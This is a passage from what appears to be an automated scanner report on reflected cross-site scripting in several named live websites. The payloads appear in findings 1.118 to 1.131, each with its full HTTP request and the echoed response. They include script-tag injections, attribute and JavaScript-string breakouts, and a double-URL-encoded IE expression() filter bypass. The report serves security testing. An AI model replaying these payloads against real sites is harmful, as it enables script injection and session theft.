Set-Cookie: 4385d0f17cf8fcee3ef445880de44c08=2d455231d6b3a9382ff7357e54908a71; path=/
Set-Cookie: ja_kyanite_ii_tpl=ja_kyanite_ii; expires=Tue, 24-Jan-2012 21:59:46 GMT; path=/
Last-Modified: Thu, 03 Feb 2011 21:59:46 GMT
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 25200


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb">

<
...[SNIP]...
<meta name="description" content="Find warehouse openings in westland michigan.html jobs and career in All Locationc4473" a=b 16a87f4d9f1, displaying 1-15 results. Daily updates Job listing with multiple Rss feed, experience the best way to find a job online" />
...[SNIP]...

1.118. http://www.jobsyndicates.com/find-jobs/All-Location/warehouse-openings-in-westland-michigan.html/x22 [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.jobsyndicates.com
Path:   /find-jobs/All-Location/warehouse-openings-in-westland-michigan.html/x22

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 636d6"%20a%3db%201c410831e56 was submitted in the REST URL parameter 3. This input was echoed as 636d6" a=b 1c410831e56 in the application's response.

This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /find-jobs/All-Location/warehouse-openings-in-westland-michigan.html636d6"%20a%3db%201c410831e56/x22 HTTP/1.1
Host: www.jobsyndicates.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 22:00:04 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.3.3
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 4385d0f17cf8fcee3ef445880de44c08=60ddc87c66256906fadd1f2a484abc98; path=/
Set-Cookie: ja_kyanite_ii_tpl=ja_kyanite_ii; expires=Tue, 24-Jan-2012 22:00:04 GMT; path=/
Last-Modified: Thu, 03 Feb 2011 22:00:04 GMT
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 25218


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb">

<
...[SNIP]...
<meta name="description" content="Find warehouse openings in westland michigan.html636d6" a=b 1c410831e56 jobs and career , displaying 1-15 results. Daily updates Job listing with multiple Rss feed, experience the best way to find a job online" />
...[SNIP]...

1.119. http://www.jobsyndicates.com/find-jobs/All-Location/warehouse-openings-in-westland-michigan.html/x22 [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.jobsyndicates.com
Path:   /find-jobs/All-Location/warehouse-openings-in-westland-michigan.html/x22

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 11311"%3bb0138398545 was submitted in the REST URL parameter 3. This input was echoed as 11311";b0138398545 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /find-jobs/All-Location/warehouse-openings-in-westland-michigan.html11311"%3bb0138398545/x22 HTTP/1.1
Host: www.jobsyndicates.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 22:00:06 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.3.3
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 4385d0f17cf8fcee3ef445880de44c08=7377341cb25663e7e8ec2eb65cf84816; path=/
Set-Cookie: ja_kyanite_ii_tpl=ja_kyanite_ii; expires=Tue, 24-Jan-2012 22:00:06 GMT; path=/
Last-Modified: Thu, 03 Feb 2011 22:00:07 GMT
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 25126


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb">

<
...[SNIP]...
<!--
indeed_jobroll_format = "160x600";
indeed_jobroll_publisher = "6387719032121626";
indeed_jobroll_keywords = "warehouse openings in westland michigan.html11311";b0138398545";
indeed_jobroll_location = "";
indeed_jobroll_country = "US";
indeed_jobroll_channel = "chanel1";
indeed_color_background = "FFFFFF";
indeed_color_border = "FFFFFF";
//-->
...[SNIP]...

1.120. http://www.kminek.pl/bsdlicense.txt [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.kminek.pl
Path:   /bsdlicense.txt

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 73100<script>alert(1)</script>af671aace11 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /bsdlicense.txt73100<script>alert(1)</script>af671aace11 HTTP/1.1
Host: www.kminek.pl
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 22:00:42 GMT
Server: Apache
X-Pingback: http://www.kminek.pl/kminek-core/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: PHPSESSID=88d2jmcinjb18m98s7vavegus2; path=/
Set-Cookie: layoutbar=deleted; expires=Wed, 03-Feb-2010 22:00:41 GMT; path=/
Last-Modified: Thu, 03 Feb 2011 22:00:42 GMT
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 8327

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html dir="ltr" lang="pl-PL">

<head>
<meta http-equiv="X-UA-Compatible" content="IE=EmulateIE7">
<meta http-
...[SNIP]...
<strong>http://www.kminek.pl/bsdlicense.txt73100<script>alert(1)</script>af671aace11</strong>
...[SNIP]...

1.121. http://www.kminek.pl/kminek-css-1271705349.css [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.kminek.pl
Path:   /kminek-css-1271705349.css

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload d399a<script>alert(1)</script>179d88325a3 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /d399a<script>alert(1)</script>179d88325a3 HTTP/1.1
Host: www.kminek.pl
Proxy-Connection: keep-alive
Referer: http://www.kminek.pl/bsdlicense.txt73100%3Cscript%3Ealert(document.cookie)%3C/script%3Eaf671aace11
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=g2rkdjbkf7e1cnmn1jpn3vrc76

Response

HTTP/1.1 404 Not Found
Date: Fri, 04 Feb 2011 01:50:03 GMT
Server: Apache
X-Pingback: http://www.kminek.pl/kminek-core/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: layoutbar=deleted; expires=Thu, 04-Feb-2010 01:50:02 GMT; path=/
Last-Modified: Fri, 04 Feb 2011 01:50:03 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 8236

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html dir="ltr" lang="pl-PL">

<head>
<meta http-equiv="X-UA-Compatible" content="IE=EmulateIE7">
<meta http-
...[SNIP]...
<strong>http://www.kminek.pl/d399a<script>alert(1)</script>179d88325a3</strong>
...[SNIP]...

1.122. http://www.kminek.pl/kminek-js-1249725108.js [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.kminek.pl
Path:   /kminek-js-1249725108.js

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload ee332<script>alert(1)</script>0b6fe74c897 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /ee332<script>alert(1)</script>0b6fe74c897 HTTP/1.1
Host: www.kminek.pl
Proxy-Connection: keep-alive
Referer: http://www.kminek.pl/bsdlicense.txt73100%3Cscript%3Ealert(document.cookie)%3C/script%3Eaf671aace11
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=g2rkdjbkf7e1cnmn1jpn3vrc76

Response

HTTP/1.1 404 Not Found
Date: Fri, 04 Feb 2011 01:50:18 GMT
Server: Apache
X-Pingback: http://www.kminek.pl/kminek-core/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: layoutbar=deleted; expires=Thu, 04-Feb-2010 01:50:17 GMT; path=/
Last-Modified: Fri, 04 Feb 2011 01:50:18 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 8236

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html dir="ltr" lang="pl-PL">

<head>
<meta http-equiv="X-UA-Compatible" content="IE=EmulateIE7">
<meta http-
...[SNIP]...
<strong>http://www.kminek.pl/ee332<script>alert(1)</script>0b6fe74c897</strong>
...[SNIP]...

1.123. http://www.kminek.pl/lab/yetii/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.kminek.pl
Path:   /lab/yetii/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 28728<script>alert(1)</script>812ffa424ab was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /lab/yetii28728<script>alert(1)</script>812ffa424ab/ HTTP/1.1
Host: www.kminek.pl
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 22:02:24 GMT
Server: Apache
X-Pingback: http://www.kminek.pl/kminek-core/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: PHPSESSID=spgj6939rjejseveijoefseot5; path=/
Set-Cookie: layoutbar=deleted; expires=Wed, 03-Feb-2010 22:02:23 GMT; path=/
Last-Modified: Thu, 03 Feb 2011 22:02:24 GMT
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 8323

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html dir="ltr" lang="pl-PL">

<head>
<meta http-equiv="X-UA-Compatible" content="IE=EmulateIE7">
<meta http-
...[SNIP]...
<strong>http://www.kminek.pl/lab/yetii28728<script>alert(1)</script>812ffa424ab/</strong>
...[SNIP]...

1.124. http://www.lightinthebox.com/wholesale-Shower-Faucets_c2863 [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.lightinthebox.com
Path:   /wholesale-Shower-Faucets_c2863

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 90e81"><script>alert(1)</script>49b2497dc was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wholesale-Shower-Faucets_c286390e81"><script>alert(1)</script>49b2497dc HTTP/1.1
Host: www.lightinthebox.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: LITBWS/1.0.8.dev
Date: Thu, 03 Feb 2011 22:02:05 GMT
Content-Type: text/html; charset=utf-8
Connection: close
Vary: Accept-Encoding
P3P: CP="CAO PSA OUR"
Set-Cookie: cookie_test=please_accept_for_session; expires=Sat, 05-Mar-2011 22:02:05 GMT; path=/; domain=.lightinthebox.com
Set-Cookie: __cust=AAAAAE1LJd2b1SLSA0e1Ag==; expires=Fri, 03-Feb-12 22:02:05 GMT; domain=lightinthebox.com; path=/
Set-Cookie: SRV=s3; path=/
Content-Length: 94075


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotoco
...[SNIP]...
<a href="/wholesale-Shower-Faucets_c286390e81"><script>alert(1)</script>49b2497dc">
...[SNIP]...

1.125. http://www.lightinthebox.com/wholesale-Shower-Faucets_c2863 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.lightinthebox.com
Path:   /wholesale-Shower-Faucets_c2863

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 82d7d'%3balert(1)//5681bfb5b3e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 82d7d';alert(1)//5681bfb5b3e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /wholesale-Shower-Faucets_c2863?82d7d'%3balert(1)//5681bfb5b3e=1 HTTP/1.1
Host: www.lightinthebox.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: LITBWS/1.0.8.dev
Date: Thu, 03 Feb 2011 22:01:54 GMT
Content-Type: text/html; charset=utf-8
Connection: close
Vary: Accept-Encoding
P3P: CP="CAO PSA OUR"
Set-Cookie: cookie_test=please_accept_for_session; expires=Sat, 05-Mar-2011 22:01:54 GMT; path=/; domain=.lightinthebox.com
Set-Cookie: __cust=AAAAAE1LJdKdmyLWA0jaAg==; expires=Fri, 03-Feb-12 22:01:54 GMT; domain=lightinthebox.com; path=/
Set-Cookie: SRV=s3; path=/
Cache-control: private
Content-Length: 155234


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotoco
...[SNIP]...
<a class="nowrap tab_USD" href="http://www.lightinthebox.com/wholesale-Shower-Faucets_c2863?82d7d';alert(1)//5681bfb5b3e=1&amp;currency=USD" rel="nofollow" title="US Dollar" target="_top">
...[SNIP]...

1.126. http://www.lightinthebox.com/wholesale-Shower-Faucets_c2863 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.lightinthebox.com
Path:   /wholesale-Shower-Faucets_c2863

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8c002"><script>alert(1)</script>7f0bb6aab4f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wholesale-Shower-Faucets_c2863?8c002"><script>alert(1)</script>7f0bb6aab4f=1 HTTP/1.1
Host: www.lightinthebox.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: LITBWS/1.0.8.dev
Date: Thu, 03 Feb 2011 22:01:52 GMT
Content-Type: text/html; charset=utf-8
Connection: close
Vary: Accept-Encoding
P3P: CP="CAO PSA OUR"
Set-Cookie: cookie_test=please_accept_for_session; expires=Sat, 05-Mar-2011 22:01:52 GMT; path=/; domain=.lightinthebox.com
Set-Cookie: __cust=AAAAAE1LJdB3+EjrA6g2Ag==; expires=Fri, 03-Feb-12 22:01:52 GMT; domain=lightinthebox.com; path=/
Set-Cookie: SRV=s2; path=/
Cache-control: private
Content-Length: 154339


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotoco
...[SNIP]...
<a class="sub-menu-icon" href="/wholesale-Shower-Faucets_c2863?8c002"><script>alert(1)</script>7f0bb6aab4f=1#nogo" rel="nofollow" title="">
...[SNIP]...

1.127. http://www.quantcast.com/p-aasG6JkxVvmNA [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.quantcast.com
Path:   /p-aasG6JkxVvmNA

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 8e5e2<a>074b39b533a was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /p-aasG6JkxVvmNA8e5e2<a>074b39b533a HTTP/1.1
Host: www.quantcast.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Apache-Coyote/1.1
Content-Type: text/html
Content-Language: en
Date: Thu, 03 Feb 2011 22:03:07 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">


<html>


<head>

<meta http-equiv="Content-Type" content="text/html; cha
...[SNIP]...
<em> p-aasG6JkxVvmNA8e5e2<a>074b39b533a</em>
...[SNIP]...

1.128. http://www.quantcast.com/p-aasG6JkxVvmNA [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.quantcast.com
Path:   /p-aasG6JkxVvmNA

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload aabbe"><a>fe7c65bf24b was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /p-aasG6JkxVvmNAaabbe"><a>fe7c65bf24b HTTP/1.1
Host: www.quantcast.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Apache-Coyote/1.1
Content-Type: text/html
Content-Language: en
Date: Thu, 03 Feb 2011 22:03:07 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">


<html>


<head>

<meta http-equiv="Content-Type" content="text/html; cha
...[SNIP]...
<input type="text" id="query" class="search-main placeholder" name="q" autocomplete="off" value=" p-aasG6JkxVvmNAaabbe"><a>fe7c65bf24b" />
...[SNIP]...

1.129. http://www.smartdraw.com/buy/x22 [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.smartdraw.com
Path:   /buy/x22

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1d612%2522style%253d%2522x%253aexpression%2528alert%25281%2529%2529%25220eedd2683a3 was submitted in the REST URL parameter 1. This input was echoed as 1d612"style="x:expression(alert(1))"0eedd2683a3 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /1d612%2522style%253d%2522x%253aexpression%2528alert%25281%2529%2529%25220eedd2683a3/x22 HTTP/1.1
Host: www.smartdraw.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 404 Not Found
Cache-Control: public,no-cache,no-store,max-age=0,must-revalidate,proxy-revalidate
Date: Thu, 03 Feb 2011 20:29:59 GMT
Content-Length: 8711
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: EXP=ste; expires=Sun, 03-Feb-2041 20:29:59 GMT; path=/
Set-Cookie: REFID=2; expires=Sun, 03-Feb-2041 20:29:59 GMT; path=/
Set-Cookie: ASP.NET_SessionId=0rroqt55mx5ciq55y2wqysn5; path=/; HttpOnly
Pragma: no-cache
Expires: Thu, 03 Feb 2011 20:29:59 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

...[SNIP]...
<iframe src="http://www.facebook.com/plugins/like.php?href=http://www.smartdraw.com/filenotfound.aspx?404;http://www.smartdraw.com:80/1d612"style="x:expression(alert(1))"0eedd2683a3/x22/&amp;layout=standard&amp;show_faces=true&amp;width=500&amp;action=like&amp;colorscheme=light&amp;height=80" scrolling="no" frameborder="0" style="border:none; overflow:hidden; width:500px; height:
...[SNIP]...

1.130. http://www.smartdraw.com/buy/x22 [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.smartdraw.com
Path:   /buy/x22

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f0935%2522style%253d%2522x%253aexpression%2528alert%25281%2529%2529%2522182a262986e was submitted in the REST URL parameter 1. This input was echoed as f0935"style="x:expression(alert(1))"182a262986e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /buyf0935%2522style%253d%2522x%253aexpression%2528alert%25281%2529%2529%2522182a262986e/x22 HTTP/1.1
Host: www.smartdraw.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 404 Not Found
Cache-Control: public,no-cache,no-store,max-age=0,must-revalidate,proxy-revalidate
Date: Thu, 03 Feb 2011 20:29:55 GMT
Content-Length: 8732
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: EXP=ste; expires=Sun, 03-Feb-2041 20:29:55 GMT; path=/
Set-Cookie: REFID=2; expires=Sun, 03-Feb-2041 20:29:55 GMT; path=/
Set-Cookie: ASP.NET_SessionId=u5pklnekx3dx2wzgqqztpun5; path=/; HttpOnly
Pragma: no-cache
Expires: Thu, 03 Feb 2011 20:29:55 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

...[SNIP]...
<a href="http://www.facebook.com/sharer.php?u=http://www.smartdraw.com/filenotfound.aspx?404;http://www.smartdraw.com:80/buyf0935"style="x:expression(alert(1))"182a262986e/x22/" rel="nofollow" target="_blank">
...[SNIP]...

1.131. http://www.smartdraw.com/buy/x22 [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.smartdraw.com
Path:   /buy/x22

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4fed4%2522style%253d%2522x%253aexpression%2528alert%25281%2529%2529%2522152282d3cc2 was submitted in the REST URL parameter 2. This input was echoed as 4fed4"style="x:expression(alert(1))"152282d3cc2 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /buy/4fed4%2522style%253d%2522x%253aexpression%2528alert%25281%2529%2529%2522152282d3cc2 HTTP/1.1
Host: www.smartdraw.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 404 Not Found
Cache-Control: public,no-cache,no-store,max-age=0,must-revalidate,proxy-revalidate
Date: Thu, 03 Feb 2011 20:30:10 GMT
Content-Length: 8711
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: EXP=ste; expires=Sun, 03-Feb-2041 20:30:10 GMT; path=/
Set-Cookie: REFID=2; expires=Sun, 03-Feb-2041 20:30:10 GMT; path=/
Set-Cookie: ASP.NET_SessionId=nmr5smvrazti5abqjnbbtv45; path=/; HttpOnly
Pragma: no-cache
Expires: Thu, 03 Feb 2011 20:30:10 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

...[SNIP]...
<iframe src="http://www.facebook.com/plugins/like.php?href=http://www.smartdraw.com/filenotfound.aspx?404;http://www.smartdraw.com:80/buy/4fed4"style="x:expression(alert(1))"152282d3cc2/&amp;layout=standard&amp;show_faces=true&amp;width=500&amp;action=like&amp;colorscheme=light&amp;height=80" scrolling="no" frameborder="0" style="border:none; overflow:hidden; width:500px; height:80px
...[SNIP]...

